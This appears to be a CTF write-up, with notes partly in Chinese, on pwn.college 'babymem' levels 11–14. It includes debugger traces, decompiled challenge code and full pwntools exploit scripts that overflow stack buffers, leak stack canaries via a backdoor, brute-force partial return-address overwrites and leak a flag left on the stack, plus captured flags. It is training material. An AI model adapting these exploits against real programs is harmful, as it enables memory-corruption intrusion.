_start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> ni50 collapsed lines
0x000055e7d6a8cd2f in challenge ()LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────*RAX 0x7044ddaff000 ◂— 0 RBX 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'*RCX 0x7044dd9fa24c (mmap64+44) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 3 RDI 0 RSI 0x1000 R8 0 R9 0*R10 0x22*R11 0x246 R12 1 R13 0 R14 0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f R15 0 RBP 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0 RSP 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */*RIP 0x55e7d6a8cd2f (challenge+193) ◂— mov qword ptr [rbp - 0x18], rax────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── 0x55e7d6a8cd2a <challenge+188> call mmap@plt <mmap@plt>
► 0x55e7d6a8cd2f <challenge+193> mov qword ptr [rbp - 0x18], rax [0x7ffcf7830618] => 0x7044ddaff000 ◂— 0 0x55e7d6a8cd33 <challenge+197> mov esi, 0 ESI => 0 0x55e7d6a8cd38 <challenge+202> lea rdi, [rip + 0x1530] RDI => 0x55e7d6a8e26f ◂— 0x67616c662f /* '/flag' */ 0x55e7d6a8cd3f <challenge+209> mov eax, 0 EAX => 0 0x55e7d6a8cd44 <challenge+214> call open@plt <open@plt>
0x55e7d6a8cd49 <challenge+219> mov dword ptr [rbp - 0x30], eax 0x55e7d6a8cd4c <challenge+222> mov rcx, qword ptr [rbp - 0x18] 0x55e7d6a8cd50 <challenge+226> mov eax, dword ptr [rbp - 0x30] 0x55e7d6a8cd53 <challenge+229> mov edx, 0x400 EDX => 0x400 0x55e7d6a8cd58 <challenge+234> mov rsi, rcx─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a9001004:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...05:0028│-038 0x7ffcf78305f8 —▸ 0x7044dd967c80 (putchar+240) ◂— jmp 0x7044dd967bd606:0030│-030 0x7ffcf7830600 ◂— 0x23007:0038│-028 0x7ffcf7830608 ◂— 0───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x55e7d6a8cd2f challenge+193 1 0x55e7d6a8d063 main+213 2 0x7044dd90ae08 3 0x7044dd90aecc __libc_start_main+140 4 0x55e7d6a8c20e _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> p/x $rax$1 = 0x7044ddaff000pwndbg> cContinuing.
Breakpoint 2, 0x000055e7d6a8ce04 in challenge ()19 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────*RAX 0x23 RBX 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'*RCX 0x22 RDX 3 RDI 0*RSI 0x78 R8 0 R9 0*R10 0*R11 0x202 R12 1 R13 0 R14 0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f R15 0 RBP 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0 RSP 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */*RIP 0x55e7d6a8ce04 (challenge+406) ◂— call 0x55e7d6a8c150────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x55e7d6a8ce04 <challenge+406> call mmap@plt <mmap@plt> addr: 0 len: 0x78 prot: 3 flags: 0x22 fd: 0 (pipe:[532567]) offset: 029 collapsed lines
0x55e7d6a8ce09 <challenge+411> mov qword ptr [rbp - 0x10], rax 0x55e7d6a8ce0d <challenge+415> mov rax, qword ptr [rbp - 0x10] 0x55e7d6a8ce11 <challenge+419> mov rsi, rax 0x55e7d6a8ce14 <challenge+422> lea rdi, [rip + 0x14cd] RDI => 0x55e7d6a8e2e8 ◂— 'Called mmap(0, 120, PROT_READ|PROT_WRITE, MAP_PRIV...' 0x55e7d6a8ce1b <challenge+429> mov eax, 0 EAX => 0 0x55e7d6a8ce20 <challenge+434> call printf@plt <printf@plt>
0x55e7d6a8ce25 <challenge+439> lea rdi, [rip + 0x1508] RDI => 0x55e7d6a8e334 ◂— 'Payload size: ' 0x55e7d6a8ce2c <challenge+446> mov eax, 0 EAX => 0 0x55e7d6a8ce31 <challenge+451> call printf@plt <printf@plt>
0x55e7d6a8ce36 <challenge+456> lea rax, [rbp - 0x28]─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a9001004:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...05:0028│-038 0x7ffcf78305f8 ◂— 0x3dd967c8006:0030│-030 0x7ffcf7830600 ◂— 0xffffffff07:0038│-028 0x7ffcf7830608 ◂— 0───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x55e7d6a8ce04 challenge+406 1 0x55e7d6a8d063 main+213 2 0x7044dd90ae08 3 0x7044dd90aecc __libc_start_main+140 4 0x55e7d6a8c20e _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> ni51 collapsed lines
0x000055e7d6a8ce09 in challenge ()LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────*RAX 0x7044ddafb000 ◂— 0 RBX 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'*RCX 0x7044dd9fa24c (mmap64+44) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 3 RDI 0 RSI 0x78 R8 0 R9 0*R10 0x22*R11 0x246 R12 1 R13 0 R14 0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f R15 0 RBP 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0 RSP 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */*RIP 0x55e7d6a8ce09 (challenge+411) ◂— mov qword ptr [rbp - 0x10], rax────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── 0x55e7d6a8ce04 <challenge+406> call mmap@plt <mmap@plt>
► 0x55e7d6a8ce09 <challenge+411> mov qword ptr [rbp - 0x10], rax [0x7ffcf7830620] => 0x7044ddafb000 ◂— 0 0x55e7d6a8ce0d <challenge+415> mov rax, qword ptr [rbp - 0x10] RAX, [0x7ffcf7830620] => 0x7044ddafb000 ◂— 0 0x55e7d6a8ce11 <challenge+419> mov rsi, rax RSI => 0x7044ddafb000 ◂— 0 0x55e7d6a8ce14 <challenge+422> lea rdi, [rip + 0x14cd] RDI => 0x55e7d6a8e2e8 ◂— 'Called mmap(0, 120, PROT_READ|PROT_WRITE, MAP_PRIV...' 0x55e7d6a8ce1b <challenge+429> mov eax, 0 EAX => 0 0x55e7d6a8ce20 <challenge+434> call printf@plt <printf@plt>
0x55e7d6a8ce25 <challenge+439> lea rdi, [rip + 0x1508] RDI => 0x55e7d6a8e334 ◂— 'Payload size: ' 0x55e7d6a8ce2c <challenge+446> mov eax, 0 EAX => 0 0x55e7d6a8ce31 <challenge+451> call printf@plt <printf@plt>
0x55e7d6a8ce36 <challenge+456> lea rax, [rbp - 0x28]─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a9001004:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...05:0028│-038 0x7ffcf78305f8 ◂— 0x3dd967c8006:0030│-030 0x7ffcf7830600 ◂— 0xffffffff07:0038│-028 0x7ffcf7830608 ◂— 0───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x55e7d6a8ce09 challenge+411 1 0x55e7d6a8d063 main+213 2 0x7044dd90ae08 3 0x7044dd90aecc __libc_start_main+140 4 0x55e7d6a8c20e _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> dist $rax $10x7044ddafb000->0x7044ddaff000 is 0x4000 bytes (0x800 words)
from pwn import ELF, context, gdb, log, pause, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-11-0"HOST = "pwn.college"PORT = 1337
gdbscript = """b *challenge+188b *challenge+406c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding = b"".ljust(0x4000, b"A")
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall()
return b"pwn.college{" in response except Exception as e: log.exception(f"An error occurred: {e}")
try: target = launch(debug=False)
payload = padding
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit()except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{oNJmkkep5Mt0PwVQdAiStSjA960.0VOwMDL5cTNxgzW}
Level 11.1
- Category: Pwn
Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!
from pwn import ELF, context, gdb, log, pause, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-11-1"HOST = "pwn.college"PORT = 1337
gdbscript = """b *challenge+104b *challenge+262b *challenge+352c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding = b"".ljust(0x4000, b"A")
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall()
return b"pwn.college{" in response except Exception as e: log.exception(f"An error occurred: {e}")
try: target = launch(debug=False)
payload = padding
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit()except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{I5165He8SxPMM_8YzEz5DkzRZ1c.0FMxMDL5cTNxgzW}
Level 12.0
- Category: Pwn
Defeat a stack canary in a PIE binary by utilizing a bug left in the binary.
108 collapsed lines
__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3){ int *v3; // rax char *v4; // rax __int64 v6; // [rsp+0h] [rbp-60h] BYREF __int64 v7; // [rsp+8h] [rbp-58h] __int64 v8; // [rsp+10h] [rbp-50h] unsigned int v9; // [rsp+1Ch] [rbp-44h] int v10; // [rsp+2Ch] [rbp-34h] size_t nbytes; // [rsp+30h] [rbp-30h] BYREF void *buf; // [rsp+38h] [rbp-28h] _QWORD v13[2]; // [rsp+40h] [rbp-20h] BYREF char v14; // [rsp+50h] [rbp-10h] unsigned __int64 v15; // [rsp+58h] [rbp-8h] __int64 savedregs; // [rsp+60h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+68h] [rbp+8h] BYREF
v9 = a1; v8 = a2; v7 = a3; v15 = __readfsqword(0x28u); v13[0] = 0LL; v13[1] = 0LL; v14 = 0; buf = v13; nbytes = 0LL; puts("The challenge() function has just been launched!"); sp_ = (__int64)&v6; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v6) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", buf); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 17); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, there is no \"win\" variable."); puts("You will need to force the program to execute the win_authed() function"); puts("by directly overflowing into the stored return address back to main,"); printf( "which is stored at %p, %d bytes after the start of your input buffer.\n", (const void *)rp_, rp_ - (_DWORD)buf); printf( "That means that you will need to input at least %d bytes (%d to fill the buffer,\n", rp_ - (_DWORD)buf + 8, 17); printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 17); puts("and 8 that will overwrite the return address).\n"); cp_ = bp_; cv_ = __readfsqword(0x28u); while ( *(_QWORD *)cp_ != cv_ ) cp_ -= 8LL; puts("Because the binary is position independent, you cannot know"); puts("exactly where the win_authed() function is located."); puts("This means that it is not clear what should be written into the return address.\n"); printf("Payload size: "); __isoc99_scanf("%lu", &nbytes); printf("You have chosen to send %lu bytes of input!\n", nbytes); printf("This will allow you to write from %p (the start of the input buffer)\n", buf); printf( "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", (char *)buf + nbytes, nbytes - 17); printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_); puts("If that number is greater than 8, you will overwrite the entire return address.\n"); puts("Overwriting the entire return address is fine when we know"); puts("the whole address, but here, we only really know the last three nibbles."); puts("These nibbles never change, because pages are aligned to 0x1000."); puts("This gives us a workaround: we can overwrite the least significant byte"); puts("of the saved return address, which we can know from debugging the binary,"); puts("to retarget the return to main to any instruction that shares the other 7 bytes."); puts("Since that last byte will be constant between executions (due to page alignment),"); puts("this will always work."); puts("If the address we want to redirect execution to is a bit farther away from"); puts("the saved return address, and we need to write two bytes, then one of those"); puts("nibbles (the fourth least-significant one) will be a guess, and it will be"); puts("incorrect 15 of 16 times."); puts("This is okay: we can just run our exploit a few times until it works"); puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times)."); puts("One caveat in this challenge is that the win_authed() function must first auth:"); puts("it only lets you win if you provide it with the argument 0x1337."); puts("Speifically, the win_authed() function looks something like:"); puts(" void win_authed(int token)"); puts(" {"); puts(" if (token != 0x1337) return;"); puts(" puts(\"You win! Here is your flag: \");"); puts(" sendfile(1, open(\"/flag\", 0), 0, 256);"); puts(" puts(\"\");"); puts(" }"); puts(byte_3E5B); puts("So how do you pass the check? There *is* a way, and we will cover it later,"); puts("but for now, we will simply bypass it! You can overwrite the return address"); puts("with *any* value (as long as it points to executable code), not just the start"); puts("of functions. Let's overwrite past the token check in win!\n"); puts("To do this, we will need to analyze the program with objdump, identify where"); puts("the check is in the win_authed() function, find the address right after the check,"); puts("and write that address over the saved return address.\n"); puts("Go ahead and find this address now. When you're ready, input a buffer overflow"); printf( "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n", (const void *)rp_, rp_ - (_DWORD)buf); puts("with the correct value.\n"); printf("Send your payload (up to %lu bytes)!\n", nbytes); v10 = read(0, buf, nbytes); if ( v10 < 0 ) { v3 = __errno_location();24 collapsed lines
v4 = strerror(*v3); printf("ERROR: Failed to read input -- %s!\n", v4); exit(1); } printf("You sent %d bytes!\n", v10); puts("Let's see what happened with the stack:\n"); DUMP_STACK(sp_, sz_); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", buf); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the canary is stored at %p.\n", (const void *)cp_); printf("- the canary value is now %p.\n", *(const void **)cp_); printf("- the address of win_authed() is %p.\n", win_authed); putchar(10); puts("If you have managed to overwrite the return address with the correct value,"); puts("challenge() will jump straight to win_authed() when it returns."); printf("Let's try it now!\n\n"); if ( (unsigned __int64)buf + v10 > rp_ + 2 ) { puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address."); puts(" This can still work, because I told you the correct address to use for"); puts(" this execution, but you should not rely on that information."); puts(" You can solve this challenge by only overwriting two bytes!"); puts(" "); } printf("You said: %s\n", (const char *)buf); puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()"); puts("call to see the hidden backdoor!"); if ( strstr((const char *)buf, "REPEAT") ) { puts("Backdoor triggered! Repeating challenge()"); return challenge(v9, v8, v7); } else { puts("Goodbye!");3 collapsed lines
return 0LL; }}
虽说是一道蛮综合的题,不过我感觉不算难,就简单说说思路好了。这个程序的问题就在于我们可以提供任意输入溢出 buf
,覆盖返回地址。但是这里有一个 canary 保护需要绕过。
我们注意到有一条 printf
会输出我们栈上的内容,那我们是不是可以填满整个 buf
,直到 canary 为止?这样 printf
就会把 canary 泄漏出来。结合 printf
判断字符串结束的机制,以及 canary
固定以 \x00
结尾,我们需要用一个任意字符填上这个空,这样就把 canary 泄漏出来了。
函数的定义如下,它会从 haystack
中搜索 needle
第一次出现的位置,返回这个位置的指针。如果没匹配到,则返回 NULL
// attributes: thunkchar *strstr(const char *haystack, const char *needle){ return strstr(haystack, needle);}
- 如果
if ( strstr((const char *)buf, "REPEAT") )
判断输入中是否包含 REPEAT
,如果包含的话就会再次调用 challenge
。因为是同一个进程再次调用 challenge
,所以 canary 的值不会改变,这就让我们泄漏出来的 canary 派上用场了。
绕过这个 win_authed
4 collapsed lines
void __fastcall win_authed(int a1){ int *v1; // rax char *v2; // rax int *v3; // rax char *v4; // rax
if ( a1 == 4919 ) { puts("You win! Here is your flag:"); flag_fd_5715 = open("/flag", 0); if ( flag_fd_5715 < 0 ) {22 collapsed lines
v1 = __errno_location(); v2 = strerror(*v1); printf("\n ERROR: Failed to open the flag -- %s!\n", v2); if ( geteuid() ) { puts(" Your effective user id is not 0!"); puts(" You must directly run the suid binary in order to have the correct permissions!"); } exit(-1); } flag_length_5716 = read(flag_fd_5715, &flag_5714, 0x100uLL); if ( flag_length_5716 <= 0 ) { v3 = __errno_location(); v4 = strerror(*v3); printf("\n ERROR: Failed to read the flag -- %s!\n", v4); exit(-1); } write(1, &flag_5714, flag_length_5716); puts("\n"); }}
当时这题困扰住我的倒不是如何构造攻击链的问题,而是写 exp 的问题……脑子抽了企图在 return challenge(v9, v8, v7);
这里返回到 win_authed
,但是这是写死在代码段的,而且权限是 r-xp
,小小栈溢出岂能覆盖?后来发现整体思路还少了一步,应该是先触发一次后门泄漏 canary,然后第二次执行的时候就不需要触发后门了,直接覆盖 challenge
随便扯两句心里话吧。踩了不少坑,希望以后可以争取做到更严谨完善的分析。还有就是动态调试很重要哦~感觉自己多少还是有一点调试恐惧症 LMAO
from pwn import ELF, context, gdb, log, pause, process, random, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-12-0"HOST, PORT = "pwn.college", 1337
gdbscript = """b *challenge+1339b *challenge+1821c"""
def to_hex_bytes(data): return "".join(f"\\x{byte:02x}" for byte in data)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
backdoor = b"REPEAT "backdoor_trigger = b"".ljust(0x12, b"A") + backdoorpadding_to_canary = b"".ljust(0x18, b"A")padding_to_ret = b"".ljust(0x8, b"A")fixed_offset = b"\xe0"possible_bytes = [bytes([i]) for i in range(0x03, 0x103, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode()
target.sendlineafter(b"Payload size: ", payload_size) target.sendafter(b"Send your payload", payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def leak_canary(target): try: send_payload(target, backdoor_trigger) target.recvuntil(backdoor)
canary = b"\x00" + target.recv(0x7) log.success(f"Canary: {to_hex_bytes(canary)}")
return canary except Exception as e: log.exception(f"An error occurred while leaking canary: {e}")
def construct_payload(target): canary = leak_canary(target)
payload = padding_to_canary payload += canary payload += padding_to_ret payload += fixed_offset + random.choice(possible_bytes)
return payload
def attack(target, payload): try: send_payload(target, payload)
response = target.recvall()
return b"pwn.college{" in response except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): while True: target = launch()
try: payload = construct_payload(target)
if attack(target, payload): log.success("Success! Exiting...")
pause() exit() else: target.close() target = launch() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{YkuEQhg7aejOObKgMu4MNlIgI-S.0VMxMDL5cTNxgzW}
Level 12.1
- Category: Pwn
Defeat a stack canary in a PIE binary by utilizing a bug left in the binary.
from pwn import ELF, context, gdb, log, pause, process, random, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-12-1"HOST, PORT = "pwn.college", 1337
gdbscript = """b *challenge+298c"""
def to_hex_bytes(data): return "".join(f"\\x{byte:02x}" for byte in data)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
backdoor = b"REPEAT "backdoor_trigger = b"".ljust(0x82, b"A") + backdoorpadding_to_canary = b"".ljust(0x88, b"A")padding_to_ret = b"".ljust(0x8, b"A")fixed_offset = b"\xcd"possible_bytes = [bytes([i]) for i in range(0x03, 0x103, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode()
target.sendlineafter(b"Payload size: ", payload_size) target.sendafter(b"Send your payload", payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def leak_canary(target): try: send_payload(target, backdoor_trigger) target.recvuntil(backdoor)
canary = b"\x00" + target.recv(0x7) log.success(f"Canary: {to_hex_bytes(canary)}")
return canary except Exception as e:log.exception(f"An error occurred while leaking canary: {e}")
def construct_payload(target): canary = leak_canary(target)
payload = padding_to_canary payload += canary payload += padding_to_ret payload += fixed_offset + random.choice(possible_bytes)
return payload
def attack(target, payload): try: send_payload(target, payload)
response = target.recvall()
return b"pwn.college{" in response except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): while True: target = launch()
try: payload = construct_payload(target)
if attack(target, payload): log.success("Success! Exiting...")
pause() exit() else: target.close() target = launch() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{Q8RGfsaRLXQyi0mLIgR3c7-_jYK.0lMxMDL5cTNxgzW}
Level 13.0
- Category: Pwn
Leak data left behind unintentionally by utilizing clever payload construction.
int verify_flag(){ int v0; // eax _BYTE v2[279]; // [rsp+79h] [rbp-117h] BYREF
*(_QWORD *)&v2[271] = __readfsqword(0x28u); v0 = open("/flag", 0); read(v0, v2, 0x100uLL); puts( "This challenge reads the flag file to verify it. Do you think this might leave traces of the flag around afterwards?\n"); return printf("The flag was read into address %p.\n\n", v2);}
这题没啥好说的吧,完全就是 verify_flag
把 flag
读到栈上了,然后我们用垃圾数据填充到 flag
头就好了,printf("You said: %.360s\n", (const char *)buf);
from pwn import ELF, context, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-13-0"HOST, PORT = "pwn.college", 1337
gdbscript = """b *verify_flag+75b *challenge+1429b *challenge+1932c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding_to_flag = b"".ljust(0x59, b"A")
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode()
target.sendlineafter(b"Payload size: ", payload_size) target.sendafter(b"Send your payload", payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): payload = padding_to_flag
return payload
def leak_flag(target, payload): try: send_payload(target, payload)
flag = b"pwn.college{" + target.recvuntil(b"}")
log.success(f"Flag successfully leaked: {flag}") except Exception as e: log.exception(f"An error occurred while performing leak_flag: {e}")
def main(): target = launch(debug=False)
payload = construct_payload()
leak_flag(target, payload)
if __name__ == "__main__": main()
Flag: pwn.college{YkKrgg8qd3Vyt4OOrpBqwsAEJ2g.01MxMDL5cTNxgzW}
Level 13.1
- Category: Pwn
Leak data left behind unintentionally by utilizing clever payload construction.
from pwn import ELF, context, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-13-1"HOST, PORT = "pwn.college", 1337
gdbscript = """b *verify_flag+75b *challenge+168c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding_to_flag = b"".ljust(0x8A, b"A")
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode()
target.sendlineafter(b"Payload size: ", payload_size) target.sendafter(b"Send your payload", payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(): payload = padding_to_flag
return payload
def leak_flag(target, payload): try: send_payload(target, payload)
flag = b"pwn.college{" + target.recvuntil(b"}")
log.success(f"Flag successfully leaked: {flag}") except Exception as e: log.exception(f"An error occurred while performing leak_flag: {e}")
def main(): target = launch(debug=False)
payload = construct_payload()
leak_flag(target, payload)
if __name__ == "__main__": main()
Flag: pwn.college{gscSxVngZ4uaJ8tU3A-fhqwrLIM.0FNxMDL5cTNxgzW}
Level 14.0
- Category: Pwn
Leak data left behind unintentionally to defeat a stack canary in a PIE binary.
107 collapsed lines
__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3){ int *v3; // rax char *v4; // rax __int64 v6; // [rsp+0h] [rbp-1E0h] BYREF __int64 v7; // [rsp+8h] [rbp-1D8h] __int64 v8; // [rsp+10h] [rbp-1D0h] unsigned int v9; // [rsp+1Ch] [rbp-1C4h] int v10; // [rsp+2Ch] [rbp-1B4h] size_t nbytes; // [rsp+30h] [rbp-1B0h] BYREF void *buf; // [rsp+38h] [rbp-1A8h] char v13; // [rsp+40h] [rbp-1A0h] BYREF unsigned __int64 v14; // [rsp+1D8h] [rbp-8h] __int64 savedregs; // [rsp+1E0h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+1E8h] [rbp+8h] BYREF
